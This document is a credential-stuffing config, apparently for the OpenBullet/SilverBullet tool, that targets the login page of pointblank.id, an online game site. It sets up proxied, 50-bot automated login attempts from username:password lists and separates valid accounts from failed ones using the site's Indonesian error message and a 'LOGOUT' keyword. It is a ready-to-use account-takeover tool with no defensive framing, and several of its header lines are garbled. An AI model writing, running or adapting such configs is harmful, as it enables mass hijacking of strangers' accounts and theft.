[SETTINGS]
{
  "Name": "pointblank.id",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2023-09-04T13:53:58.1552194+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@Lollipop_US",
  "Version": "1.0.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://www.pointblank.id/login/process" 
  CONTENT "loginFail=0&userid=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Host: " 
  HEADER "Origin: " 
  HEADER "https: //www.pointblank.id/login/form" 
  HEADER "Referer: " 
  HEADER "User-Agent: " 
  HEADER "Accept: " 
  HEADER "Accept-Encoding: " 
  HEADER "Accept-Language: " 
  HEADER "Cache-Control: " 
  HEADER "Connection: " 
  HEADER "Content-Length: " 
  HEADER "Content-Type: " 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Data login yang anda masukan tidak sesuai." 
  KEYCHAIN Success OR 
    KEY "LOGOUT" 

FUNCTION Constant "Tiktok By @scht_" -> CAP "BY " 

